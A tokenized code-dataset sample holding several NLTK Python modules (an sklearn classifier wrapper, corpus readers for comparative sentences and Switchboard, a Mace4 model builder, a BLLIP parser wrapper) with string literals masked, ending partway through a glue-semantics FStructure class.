<s> """<STR_LIT>""" <EOL> from __future__ import print_function , unicode_literals <EOL> from nltk . classify . api import ClassifierI <EOL> from nltk . probability import DictionaryProbDist <EOL> from nltk import compat <EOL> try : <EOL> from sklearn . feature_extraction import DictVectorizer <EOL> from sklearn . preprocessing import LabelEncoder <EOL> except ImportError : <EOL> pass <EOL> __all__ = [ '<STR_LIT>' ] <EOL> @ compat . python_2_unicode_compatible <EOL> class SklearnClassifier ( ClassifierI ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , estimator , dtype = float , sparse = True ) : <EOL> """<STR_LIT>""" <EOL> self . _clf = estimator <EOL> self . _encoder = LabelEncoder ( ) <EOL> self . _vectorizer = DictVectorizer ( dtype = dtype , sparse = sparse ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % self . _clf <EOL> def classify_many ( self , featuresets ) : <EOL> """<STR_LIT>""" <EOL> X = self . _vectorizer . transform ( featuresets ) <EOL> classes = self . _encoder . classes_ <EOL> return [ classes [ i ] for i in self . _clf . predict ( X ) ] <EOL> def prob_classify_many ( self , featuresets ) : <EOL> """<STR_LIT>""" <EOL> X = self . _vectorizer . transform ( featuresets ) <EOL> y_proba_list = self . _clf . predict_proba ( X ) <EOL> return [ self . _make_probdist ( y_proba ) for y_proba in y_proba_list ] <EOL> def labels ( self ) : <EOL> """<STR_LIT>""" <EOL> return list ( self . _encoder . classes_ ) <EOL> def train ( self , labeled_featuresets ) : <EOL> """<STR_LIT>""" <EOL> X , y = list ( compat . izip ( * labeled_featuresets ) ) <EOL> X = self . _vectorizer . fit_transform ( X ) <EOL> y = self . _encoder . fit_transform ( y ) <EOL> self . _clf . fit ( X , y ) <EOL> return self <EOL> def _make_probdist ( self , y_proba ) : <EOL> classes = self . _encoder . classes_ <EOL> return DictionaryProbDist ( dict ( ( classes [ i ] , p ) <EOL> for i , p in enumerate ( y_proba ) ) ) <EOL> def setup_module ( module ) : <EOL> from nose import SkipTest <EOL> try : <EOL> import sklearn <EOL> except ImportError : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> from nltk . classify . util import names_demo , names_demo_features <EOL> from sklearn . linear_model import LogisticRegression <EOL> from sklearn . naive_bayes import BernoulliNB <EOL> print ( "<STR_LIT>" ) <EOL> names_demo ( SklearnClassifier ( BernoulliNB ( binarize = False ) ) . train , <EOL> features = names_demo_features ) <EOL> print ( "<STR_LIT>" ) <EOL> names_demo ( SklearnClassifier ( LogisticRegression ( C = <NUM_LIT:1000> ) ) . train , <EOL> features = names_demo_features ) </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> from nltk . corpus . reader . api import * <EOL> from nltk . tokenize import * <EOL> STARS = re . compile ( r'<STR_LIT>' ) <EOL> COMPARISON = re . compile ( r'<STR_LIT>' ) <EOL> CLOSE_COMPARISON = re . compile ( r'<STR_LIT>' ) <EOL> GRAD_COMPARISON = re . compile ( r'<STR_LIT>' ) <EOL> NON_GRAD_COMPARISON = re . compile ( r'<STR_LIT>' ) <EOL> ENTITIES_FEATS = re . compile ( r"<STR_LIT>" ) <EOL> KEYWORD = re . compile ( r'<STR_LIT>' ) <EOL> class Comparison ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , text = None , comp_type = None , entity_1 = None , entity_2 = None , <EOL> feature = None , keyword = None ) : <EOL> """<STR_LIT>""" <EOL> self . text = text <EOL> self . comp_type = comp_type <EOL> self . entity_1 = entity_1 <EOL> self . entity_2 = entity_2 <EOL> self . feature = feature <EOL> self . keyword = keyword <EOL> def __repr__ ( self ) : <EOL> return ( "<STR_LIT>" <EOL> "<STR_LIT>" ) . format ( self . text , self . comp_type , <EOL> self . entity_1 , self . entity_2 , self . feature , self . keyword ) <EOL> class ComparativeSentencesCorpusReader ( CorpusReader ) : <EOL> """<STR_LIT>""" <EOL> CorpusView = StreamBackedCorpusView <EOL> def __init__ ( self , root , fileids , word_tokenizer = WhitespaceTokenizer ( ) , <EOL> sent_tokenizer = None , encoding = '<STR_LIT:utf8>' ) : <EOL> """<STR_LIT>""" <EOL> CorpusReader . __init__ ( self , root , fileids , encoding ) <EOL> self . _word_tokenizer = word_tokenizer <EOL> self . _sent_tokenizer = sent_tokenizer <EOL> def comparisons ( self , fileids = None ) : <EOL> """<STR_LIT>""" <EOL> if fileids is None : <EOL> fileids = self . _fileids <EOL> elif isinstance ( fileids , compat . string_types ) : <EOL> fileids = [ fileids ] <EOL> return concat ( [ self . CorpusView ( path , self . _read_comparison_block , encoding = enc ) <EOL> for ( path , enc , fileid ) in self . abspaths ( fileids , True , True ) ] ) <EOL> def keywords ( self , fileids = None ) : <EOL> """<STR_LIT>""" <EOL> all_keywords = concat ( [ self . CorpusView ( path , self . _read_keyword_block , encoding = enc ) <EOL> for ( path , enc , fileid ) <EOL> in self . abspaths ( fileids , True , True ) ] ) <EOL> keywords_set = set ( [ keyword . lower ( ) for keyword in all_keywords if keyword ] ) <EOL> return keywords_set <EOL> def keywords_readme ( self ) : <EOL> """<STR_LIT>""" <EOL> keywords = [ ] <EOL> raw_text = self . open ( "<STR_LIT>" ) . read ( ) <EOL> for line in raw_text . split ( "<STR_LIT:\n>" ) : <EOL> if not line or line . startswith ( "<STR_LIT>" ) : <EOL> continue <EOL> keywords . append ( line . strip ( ) ) <EOL> return keywords <EOL> def raw ( self , fileids = None ) : <EOL> """<STR_LIT>""" <EOL> if fileids is None : <EOL> fileids = self . _fileids <EOL> elif isinstance ( fileids , string_types ) : <EOL> fileids = [ fileids ] <EOL> return concat ( [ self . open ( f ) . read ( ) for f in fileids ] ) <EOL> def readme ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . open ( "<STR_LIT>" ) . read ( ) <EOL> def sents ( self , fileids = None ) : <EOL> """<STR_LIT>""" <EOL> return concat ( [ self . CorpusView ( path , self . _read_sent_block , encoding = enc ) <EOL> for ( path , enc , fileid ) in self . abspaths ( fileids , True , True ) ] ) <EOL> def words ( self , fileids = None ) : <EOL> """<STR_LIT>""" <EOL> return concat ( [ self . CorpusView ( path , self . _read_word_block , encoding = enc ) <EOL> for ( path , enc , fileid ) <EOL> in self . abspaths ( fileids , True , True ) ] ) <EOL> def _read_comparison_block ( self , stream ) : <EOL> while True : <EOL> line = stream . readline ( ) <EOL> if not line : <EOL> return [ ] <EOL> comparison_tags = re . findall ( COMPARISON , line ) <EOL> if comparison_tags : <EOL> grad_comparisons = re . findall ( GRAD_COMPARISON , line ) <EOL> non_grad_comparisons = re . findall ( NON_GRAD_COMPARISON , line ) <EOL> comparison_text = stream . readline ( ) . strip ( ) <EOL> if self . _word_tokenizer : <EOL> comparison_text = self . _word_tokenizer . tokenize ( comparison_text ) <EOL> stream . readline ( ) <EOL> comparison_bundle = [ ] <EOL> if grad_comparisons : <EOL> for comp in grad_comparisons : <EOL> comp_type = int ( re . match ( r'<STR_LIT>' , comp ) . group ( <NUM_LIT:1> ) ) <EOL> comparison = Comparison ( text = comparison_text , comp_type = comp_type ) <EOL> line = stream . readline ( ) <EOL> entities_feats = ENTITIES_FEATS . findall ( line ) <EOL> if entities_feats : <EOL> for ( code , entity_feat ) in entities_feats : <EOL> if code == '<STR_LIT:1>' : <EOL> comparison . entity_1 = entity_feat . strip ( ) <EOL> elif code == '<STR_LIT:2>' : <EOL> comparison . entity_2 = entity_feat . strip ( ) <EOL> elif code == '<STR_LIT:3>' : <EOL> comparison . feature = entity_feat . strip ( ) <EOL> keyword = KEYWORD . findall ( line ) <EOL> if keyword : <EOL> comparison . keyword = keyword [ <NUM_LIT:0> ] <EOL> comparison_bundle . append ( comparison ) <EOL> if non_grad_comparisons : <EOL> for comp in non_grad_comparisons : <EOL> comp_type = int ( re . match ( r'<STR_LIT>' , comp ) . group ( <NUM_LIT:1> ) ) <EOL> comparison = Comparison ( text = comparison_text , comp_type = comp_type ) <EOL> comparison_bundle . append ( comparison ) <EOL> return comparison_bundle <EOL> def _read_keyword_block ( self , stream ) : <EOL> keywords = [ ] <EOL> for comparison in self . _read_comparison_block ( stream ) : <EOL> keywords . append ( comparison . keyword ) <EOL> return keywords <EOL> def _read_sent_block ( self , stream ) : <EOL> while True : <EOL> line = stream . readline ( ) <EOL> if re . match ( STARS , line ) : <EOL> while True : <EOL> line = stream . readline ( ) <EOL> if re . match ( STARS , line ) : <EOL> break <EOL> continue <EOL> if not re . findall ( COMPARISON , line ) and not ENTITIES_FEATS . findall ( line ) and not re . findall ( CLOSE_COMPARISON , line ) : <EOL> if self . _sent_tokenizer : <EOL> return [ self . _word_tokenizer . tokenize ( sent ) <EOL> for sent in self . _sent_tokenizer . tokenize ( line ) ] <EOL> else : <EOL> return [ self . _word_tokenizer . tokenize ( line ) ] <EOL> def _read_word_block ( self , stream ) : <EOL> words = [ ] <EOL> for sent in self . _read_sent_block ( stream ) : <EOL> words . extend ( sent ) <EOL> return words </s>
<s> from __future__ import unicode_literals <EOL> import re <EOL> from nltk . tag import str2tuple , map_tag <EOL> from nltk import compat <EOL> from nltk . corpus . reader . util import * <EOL> from nltk . corpus . reader . api import * <EOL> @ compat . python_2_unicode_compatible <EOL> class SwitchboardTurn ( list ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , words , speaker , id ) : <EOL> list . __init__ ( self , words ) <EOL> self . speaker = speaker <EOL> self . id = int ( id ) <EOL> def __repr__ ( self ) : <EOL> if len ( self ) == <NUM_LIT:0> : <EOL> text = '<STR_LIT>' <EOL> elif isinstance ( self [ <NUM_LIT:0> ] , tuple ) : <EOL> text = '<STR_LIT:U+0020>' . join ( '<STR_LIT>' % w for w in self ) <EOL> else : <EOL> text = '<STR_LIT:U+0020>' . join ( self ) <EOL> return '<STR_LIT>' % ( self . speaker , self . id , text ) <EOL> class SwitchboardCorpusReader ( CorpusReader ) : <EOL> _FILES = [ '<STR_LIT>' ] <EOL> def __init__ ( self , root , tagset = None ) : <EOL> CorpusReader . __init__ ( self , root , self . _FILES ) <EOL> self . _tagset = tagset <EOL> def words ( self ) : <EOL> return StreamBackedCorpusView ( self . abspath ( '<STR_LIT>' ) , <EOL> self . _words_block_reader ) <EOL> def tagged_words ( self , tagset = None ) : <EOL> def tagged_words_block_reader ( stream ) : <EOL> return self . _tagged_words_block_reader ( stream , tagset ) <EOL> return StreamBackedCorpusView ( self . abspath ( '<STR_LIT>' ) , <EOL> tagged_words_block_reader ) <EOL> def turns ( self ) : <EOL> return StreamBackedCorpusView ( self . abspath ( '<STR_LIT>' ) , <EOL> self . _turns_block_reader ) <EOL> def tagged_turns ( self , tagset = None ) : <EOL> def tagged_turns_block_reader ( stream ) : <EOL> return self . _tagged_turns_block_reader ( stream , tagset ) <EOL> return StreamBackedCorpusView ( self . abspath ( '<STR_LIT>' ) , <EOL> tagged_turns_block_reader ) <EOL> def discourses ( self ) : <EOL> return StreamBackedCorpusView ( self . abspath ( '<STR_LIT>' ) , <EOL> self . _discourses_block_reader ) <EOL> def tagged_discourses ( self , tagset = False ) : <EOL> def tagged_discourses_block_reader ( stream ) : <EOL> return self . _tagged_discourses_block_reader ( stream , tagset ) <EOL> return StreamBackedCorpusView ( self . abspath ( '<STR_LIT>' ) , <EOL> tagged_discourses_block_reader ) <EOL> def _discourses_block_reader ( self , stream ) : <EOL> return [ [ self . _parse_utterance ( u , include_tag = False ) <EOL> for b in read_blankline_block ( stream ) <EOL> for u in b . split ( '<STR_LIT:\n>' ) if u . strip ( ) ] ] <EOL> def _tagged_discourses_block_reader ( self , stream , tagset = None ) : <EOL> return [ [ self . _parse_utterance ( u , include_tag = True , <EOL> tagset = tagset ) <EOL> for b in read_blankline_block ( stream ) <EOL> for u in b . split ( '<STR_LIT:\n>' ) if u . strip ( ) ] ] <EOL> def _turns_block_reader ( self , stream ) : <EOL> return self . _discourses_block_reader ( stream ) [ <NUM_LIT:0> ] <EOL> def _tagged_turns_block_reader ( self , stream , tagset = None ) : <EOL> return self . _tagged_discourses_block_reader ( stream , tagset ) [ <NUM_LIT:0> ] <EOL> def _words_block_reader ( self , stream ) : <EOL> return sum ( self . _discourses_block_reader ( stream ) [ <NUM_LIT:0> ] , [ ] ) <EOL> def _tagged_words_block_reader ( self , stream , tagset = None ) : <EOL> return sum ( self . _tagged_discourses_block_reader ( stream , <EOL> tagset ) [ <NUM_LIT:0> ] , [ ] ) <EOL> _UTTERANCE_RE = re . compile ( '<STR_LIT>' ) <EOL> _SEP = '<STR_LIT:/>' <EOL> def _parse_utterance ( self , utterance , include_tag , tagset = None ) : <EOL> m = self . _UTTERANCE_RE . match ( utterance ) <EOL> if m is None : <EOL> raise ValueError ( '<STR_LIT>' % utterance ) <EOL> speaker , id , text = m . groups ( ) <EOL> words = [ str2tuple ( s , self . _SEP ) for s in text . split ( ) ] <EOL> if not include_tag : <EOL> words = [ w for ( w , t ) in words ] <EOL> elif tagset and tagset != self . _tagset : <EOL> words = [ ( w , map_tag ( self . _tagset , tagset , t ) ) for ( w , t ) in words ] <EOL> return SwitchboardTurn ( words , speaker , id ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import os <EOL> import tempfile <EOL> from nltk . sem . logic import is_indvar <EOL> from nltk . sem import Valuation , Expression <EOL> from nltk . inference . api import ModelBuilder , BaseModelBuilderCommand <EOL> from nltk . inference . prover9 import Prover9CommandParent , Prover9Parent <EOL> class MaceCommand ( Prover9CommandParent , BaseModelBuilderCommand ) : <EOL> """<STR_LIT>""" <EOL> _interpformat_bin = None <EOL> def __init__ ( self , goal = None , assumptions = None , max_models = <NUM_LIT> , model_builder = None ) : <EOL> """<STR_LIT>""" <EOL> if model_builder is not None : <EOL> assert isinstance ( model_builder , Mace ) <EOL> else : <EOL> model_builder = Mace ( max_models ) <EOL> BaseModelBuilderCommand . __init__ ( self , model_builder , goal , assumptions ) <EOL> @ property <EOL> def valuation ( mbc ) : return mbc . model ( '<STR_LIT>' ) <EOL> def _convert2val ( self , valuation_str ) : <EOL> """<STR_LIT>""" <EOL> valuation_standard_format = self . _transform_output ( valuation_str , '<STR_LIT>' ) <EOL> val = [ ] <EOL> for line in valuation_standard_format . splitlines ( False ) : <EOL> l = line . strip ( ) <EOL> if l . startswith ( '<STR_LIT>' ) : <EOL> num_entities = int ( l [ l . index ( '<STR_LIT:(>' ) + <NUM_LIT:1> : l . index ( '<STR_LIT:U+002C>' ) ] . strip ( ) ) <EOL> elif l . startswith ( '<STR_LIT>' ) and l . find ( '<STR_LIT:_>' ) == - <NUM_LIT:1> : <EOL> name = l [ l . index ( '<STR_LIT:(>' ) + <NUM_LIT:1> : l . index ( '<STR_LIT:U+002C>' ) ] . strip ( ) <EOL> if is_indvar ( name ) : <EOL> name = name . upper ( ) <EOL> value = int ( l [ l . index ( '<STR_LIT:[>' ) + <NUM_LIT:1> : l . index ( '<STR_LIT:]>' ) ] . strip ( ) ) <EOL> val . append ( ( name , MaceCommand . _make_model_var ( value ) ) ) <EOL> elif l . startswith ( '<STR_LIT>' ) : <EOL> l = l [ l . index ( '<STR_LIT:(>' ) + <NUM_LIT:1> : ] <EOL> if '<STR_LIT:(>' in l : <EOL> name = l [ : l . index ( '<STR_LIT:(>' ) ] . strip ( ) <EOL> values = [ int ( v . strip ( ) ) for v in l [ l . index ( '<STR_LIT:[>' ) + <NUM_LIT:1> : l . index ( '<STR_LIT:]>' ) ] . split ( '<STR_LIT:U+002C>' ) ] <EOL> val . append ( ( name , MaceCommand . _make_relation_set ( num_entities , values ) ) ) <EOL> else : <EOL> name = l [ : l . index ( '<STR_LIT:U+002C>' ) ] . strip ( ) <EOL> value = int ( l [ l . index ( '<STR_LIT:[>' ) + <NUM_LIT:1> : l . index ( '<STR_LIT:]>' ) ] . strip ( ) ) <EOL> val . append ( ( name , value == <NUM_LIT:1> ) ) <EOL> return Valuation ( val ) <EOL> @ staticmethod <EOL> def _make_relation_set ( num_entities , values ) : <EOL> """<STR_LIT>""" <EOL> r = set ( ) <EOL> for position in [ pos for ( pos , v ) in enumerate ( values ) if v == <NUM_LIT:1> ] : <EOL> r . add ( tuple ( MaceCommand . _make_relation_tuple ( position , values , num_entities ) ) ) <EOL> return r <EOL> @ staticmethod <EOL> def _make_relation_tuple ( position , values , num_entities ) : <EOL> if len ( values ) == <NUM_LIT:1> : <EOL> return [ ] <EOL> else : <EOL> sublist_size = len ( values ) // num_entities <EOL> sublist_start = position // sublist_size <EOL> sublist_position = int ( position % sublist_size ) <EOL> sublist = values [ sublist_start * sublist_size : ( sublist_start + <NUM_LIT:1> ) * sublist_size ] <EOL> return [ MaceCommand . _make_model_var ( sublist_start ) ] + MaceCommand . _make_relation_tuple ( sublist_position , <EOL> sublist , <EOL> num_entities ) <EOL> @ staticmethod <EOL> def _make_model_var ( value ) : <EOL> """<STR_LIT>""" <EOL> letter = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' , '<STR_LIT:d>' , '<STR_LIT:e>' , '<STR_LIT:f>' , '<STR_LIT:g>' , '<STR_LIT:h>' , '<STR_LIT:i>' , '<STR_LIT>' , '<STR_LIT:k>' , '<STR_LIT:l>' , '<STR_LIT:m>' , '<STR_LIT:n>' , <EOL> '<STR_LIT:o>' , '<STR_LIT:p>' , '<STR_LIT:q>' , '<STR_LIT:r>' , '<STR_LIT:s>' , '<STR_LIT:t>' , '<STR_LIT:u>' , '<STR_LIT:v>' , '<STR_LIT:w>' , '<STR_LIT:x>' , '<STR_LIT:y>' , '<STR_LIT:z>' ] [ value ] <EOL> num = value // <NUM_LIT> <EOL> return ( letter + str ( num ) if num > <NUM_LIT:0> else letter ) <EOL> def _decorate_model ( self , valuation_str , format ) : <EOL> """<STR_LIT>""" <EOL> if not format : <EOL> return valuation_str <EOL> elif format == '<STR_LIT>' : <EOL> return self . _convert2val ( valuation_str ) <EOL> else : <EOL> return self . _transform_output ( valuation_str , format ) <EOL> def _transform_output ( self , valuation_str , format ) : <EOL> """<STR_LIT>""" <EOL> if format in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return self . _call_interpformat ( valuation_str , [ format ] ) [ <NUM_LIT:0> ] <EOL> else : <EOL> raise LookupError ( "<STR_LIT>" ) <EOL> def _call_interpformat ( self , input_str , args = [ ] , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> if self . _interpformat_bin is None : <EOL> self . _interpformat_bin = self . _modelbuilder . _find_binary ( <EOL> '<STR_LIT>' , verbose ) <EOL> return self . _modelbuilder . _call ( input_str , self . _interpformat_bin , <EOL> args , verbose ) <EOL> class Mace ( Prover9Parent , ModelBuilder ) : <EOL> _mace4_bin = None <EOL> def __init__ ( self , end_size = <NUM_LIT> ) : <EOL> self . _end_size = end_size <EOL> """<STR_LIT>""" <EOL> def _build_model ( self , goal = None , assumptions = None , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> if not assumptions : <EOL> assumptions = [ ] <EOL> stdout , returncode = self . _call_mace4 ( self . prover9_input ( goal , assumptions ) , <EOL> verbose = verbose ) <EOL> return ( returncode == <NUM_LIT:0> , stdout ) <EOL> def _call_mace4 ( self , input_str , args = [ ] , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> if self . _mace4_bin is None : <EOL> self . _mace4_bin = self . _find_binary ( '<STR_LIT>' , verbose ) <EOL> updated_input_str = '<STR_LIT>' <EOL> if self . _end_size > <NUM_LIT:0> : <EOL> updated_input_str += '<STR_LIT>' % self . _end_size <EOL> updated_input_str += input_str <EOL> return self . _call ( updated_input_str , self . _mace4_bin , args , verbose ) <EOL> def spacer ( num = <NUM_LIT:30> ) : <EOL> print ( '<STR_LIT:->' * num ) <EOL> def decode_result ( found ) : <EOL> """<STR_LIT>""" <EOL> return { True : '<STR_LIT>' , False : '<STR_LIT>' , None : '<STR_LIT:None>' } [ found ] <EOL> def test_model_found ( arguments ) : <EOL> """<STR_LIT>""" <EOL> for ( goal , assumptions ) in arguments : <EOL> g = Expression . fromstring ( goal ) <EOL> alist = [ lp . parse ( a ) for a in assumptions ] <EOL> m = MaceCommand ( g , assumptions = alist , max_models = <NUM_LIT:50> ) <EOL> found = m . build_model ( ) <EOL> for a in alist : <EOL> print ( '<STR_LIT>' % a ) <EOL> print ( '<STR_LIT>' % ( g , decode_result ( found ) ) ) <EOL> def test_build_model ( arguments ) : <EOL> """<STR_LIT>""" <EOL> g = Expression . fromstring ( '<STR_LIT>' ) <EOL> alist = [ Expression . fromstring ( a ) for a in [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ] <EOL> m = MaceCommand ( g , assumptions = alist ) <EOL> m . build_model ( ) <EOL> spacer ( ) <EOL> print ( "<STR_LIT>" ) <EOL> spacer ( ) <EOL> for a in alist : <EOL> print ( '<STR_LIT>' % a ) <EOL> print ( '<STR_LIT>' % ( g , decode_result ( m . build_model ( ) ) ) ) <EOL> spacer ( ) <EOL> print ( "<STR_LIT>" ) <EOL> spacer ( ) <EOL> print ( m . valuation , '<STR_LIT:\n>' ) <EOL> def test_transform_output ( argument_pair ) : <EOL> """<STR_LIT>""" <EOL> g = Expression . fromstring ( argument_pair [ <NUM_LIT:0> ] ) <EOL> alist = [ lp . parse ( a ) for a in argument_pair [ <NUM_LIT:1> ] ] <EOL> m = MaceCommand ( g , assumptions = alist ) <EOL> m . build_model ( ) <EOL> for a in alist : <EOL> print ( '<STR_LIT>' % a ) <EOL> print ( '<STR_LIT>' % ( g , m . build_model ( ) ) ) <EOL> for format in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> spacer ( ) <EOL> print ( "<STR_LIT>" % format ) <EOL> spacer ( ) <EOL> print ( m . model ( format = format ) ) <EOL> def test_make_relation_set ( ) : <EOL> print ( MaceCommand . _make_relation_set ( num_entities = <NUM_LIT:3> , values = [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] ) == set ( [ ( '<STR_LIT:c>' , ) , ( '<STR_LIT:a>' , ) ] ) ) <EOL> print ( MaceCommand . _make_relation_set ( num_entities = <NUM_LIT:3> , values = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] ) == set ( [ ( '<STR_LIT:c>' , '<STR_LIT:a>' ) ] ) ) <EOL> print ( MaceCommand . _make_relation_set ( num_entities = <NUM_LIT:2> , values = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ] ) == set ( [ ( '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:a>' ) , ( '<STR_LIT:b>' , '<STR_LIT:b>' , '<STR_LIT:a>' ) ] ) ) <EOL> arguments = [ <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> ] <EOL> def demo ( ) : <EOL> test_model_found ( arguments ) <EOL> test_build_model ( arguments ) <EOL> test_transform_output ( arguments [ <NUM_LIT:1> ] ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> demo ( ) </s>
<s> from __future__ import print_function <EOL> from nltk . parse . api import ParserI <EOL> from nltk . tree import Tree <EOL> """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' ] <EOL> try : <EOL> from bllipparser import RerankingParser <EOL> from bllipparser . RerankingParser import get_unified_model_parameters <EOL> def _ensure_bllip_import_or_error ( ) : <EOL> pass <EOL> except ImportError as ie : <EOL> def _ensure_bllip_import_or_error ( ie = ie ) : <EOL> raise ImportError ( "<STR_LIT>" % ie ) <EOL> def _ensure_ascii ( words ) : <EOL> try : <EOL> for i , word in enumerate ( words ) : <EOL> word . decode ( '<STR_LIT:ascii>' ) <EOL> except UnicodeDecodeError : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( i , word ) ) <EOL> def _scored_parse_to_nltk_tree ( scored_parse ) : <EOL> return Tree . fromstring ( str ( scored_parse . ptb_parse ) ) <EOL> class BllipParser ( ParserI ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , parser_model = None , reranker_features = None , <EOL> reranker_weights = None , parser_options = None , <EOL> reranker_options = None ) : <EOL> """<STR_LIT>""" <EOL> _ensure_bllip_import_or_error ( ) <EOL> parser_options = parser_options or { } <EOL> reranker_options = reranker_options or { } <EOL> self . rrp = RerankingParser ( ) <EOL> self . rrp . load_parser_model ( parser_model , ** parser_options ) <EOL> if reranker_features and reranker_weights : <EOL> self . rrp . load_reranker_model ( features_filename = reranker_features , <EOL> weights_filename = reranker_weights , <EOL> ** reranker_options ) <EOL> def parse ( self , sentence ) : <EOL> """<STR_LIT>""" <EOL> _ensure_ascii ( sentence ) <EOL> nbest_list = self . rrp . parse ( sentence ) <EOL> for scored_parse in nbest_list : <EOL> yield _scored_parse_to_nltk_tree ( scored_parse ) <EOL> def tagged_parse ( self , word_and_tag_pairs ) : <EOL> """<STR_LIT>""" <EOL> words = [ ] <EOL> tag_map = { } <EOL> for i , ( word , tag ) in enumerate ( word_and_tag_pairs ) : <EOL> words . append ( word ) <EOL> if tag is not None : <EOL> tag_map [ i ] = tag <EOL> _ensure_ascii ( words ) <EOL> nbest_list = self . rrp . parse_tagged ( words , tag_map ) <EOL> for scored_parse in nbest_list : <EOL> yield _scored_parse_to_nltk_tree ( scored_parse ) <EOL> @ classmethod <EOL> def from_unified_model_dir ( this_class , model_dir , parser_options = None , <EOL> reranker_options = None ) : <EOL> """<STR_LIT>""" <EOL> ( parser_model_dir , reranker_features_filename , <EOL> reranker_weights_filename ) = get_unified_model_parameters ( model_dir ) <EOL> return this_class ( parser_model_dir , reranker_features_filename , <EOL> reranker_weights_filename , parser_options , <EOL> reranker_options ) <EOL> def demo ( ) : <EOL> """<STR_LIT>""" <EOL> from nltk . data import find <EOL> model_dir = find ( '<STR_LIT>' ) . path <EOL> print ( '<STR_LIT>' ) <EOL> bllip = BllipParser . from_unified_model_dir ( model_dir ) <EOL> print ( '<STR_LIT>' ) <EOL> sentence1 = '<STR_LIT>' . split ( ) <EOL> sentence2 = '<STR_LIT>' . split ( ) <EOL> fail1 = '<STR_LIT>' . split ( ) <EOL> for sentence in ( sentence1 , sentence2 , fail1 ) : <EOL> print ( '<STR_LIT>' % '<STR_LIT:U+0020>' . join ( sentence ) ) <EOL> try : <EOL> tree = next ( bllip . parse ( sentence ) ) <EOL> print ( tree ) <EOL> except StopIteration : <EOL> print ( "<STR_LIT>" ) <EOL> for i , parse in enumerate ( bllip . parse ( sentence1 ) ) : <EOL> print ( '<STR_LIT>' % ( i , parse ) ) <EOL> print ( "<STR_LIT>" , <EOL> next ( bllip . tagged_parse ( [ ( '<STR_LIT:A>' , None ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) ) ) <EOL> print ( "<STR_LIT>" , <EOL> next ( bllip . tagged_parse ( [ ( '<STR_LIT:A>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) ) ) <EOL> print ( "<STR_LIT>" , <EOL> next ( bllip . tagged_parse ( [ ( '<STR_LIT:A>' , '<STR_LIT>' ) , ( '<STR_LIT>' , None ) ] ) ) ) <EOL> def setup_module ( module ) : <EOL> from nose import SkipTest <EOL> try : <EOL> _ensure_bllip_import_or_error ( ) <EOL> except ImportError : <EOL> raise SkipTest ( '<STR_LIT>' <EOL> '<STR_LIT>' ) </s>
<s> from __future__ import print_function , division , unicode_literals <EOL> from nltk . internals import Counter <EOL> from nltk . compat import python_2_unicode_compatible <EOL> @ python_2_unicode_compatible <EOL> class FStructure ( dict ) : <EOL> def safeappend ( self , key , item ) : <EOL> """<STR_LIT>""" <EOL> if key not in self : <EOL> self [ key ] = [ ] <EOL> self [ key ] . append ( item ) <EOL> def __setitem__ ( self , key , value ) : <EOL> dict . __setitem__ ( self , key . lower ( ) , value ) <EOL> def __getitem__ ( self , key ) : <EOL> return dict . __getitem__ ( self , key . lower ( ) ) <EOL> def __contains__ ( self , key ) : <EOL> return dict . __contains__ ( self , key . lower ( ) ) <EOL> def to_glueformula_list ( self , glue_dict ) : <EOL> depgraph = self . to_depgraph ( ) <EOL> return glue_dict . to_glueformula_list ( depgraph ) <EOL> def to_depgraph ( self , rel = None ) : <EOL> from nltk . parse . dependencygraph import DependencyGraph <EOL> depgraph = DependencyGraph ( ) <EOL> nodes = depgraph . nodes <EOL> self . _to_depgraph ( nodes , <NUM_LIT:0> , '<STR_LIT>' ) <EOL> for address , node in nodes . items ( ) : <EOL> for n2 in ( n for n in nodes . values ( ) if n [ '<STR_LIT>' ] != '<STR_LIT>' ) : <EOL> if n2 [ '<STR_LIT>' ] == address : <EOL> relation = n2 [ '<STR_LIT>' ] <EOL> node [ '<STR_LIT>' ] . setdefault ( relation , [ ] ) <EOL> node [ '<STR_LIT>' ] [ relation ] . append ( n2 [ '<STR_LIT:address>' ] ) <EOL> depgraph . root = nodes [ <NUM_LIT:1> ] <EOL> return depgraph <EOL> def _to_depgraph ( self , nodes , head , rel ) : <EOL> index = len ( nodes ) <EOL> nodes [ index ] . update ( <EOL> { <EOL> '<STR_LIT:address>' : index , <EOL> '<STR_LIT>' : self . pred [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : self . pred [ <NUM_LIT:1> ] , <EOL> 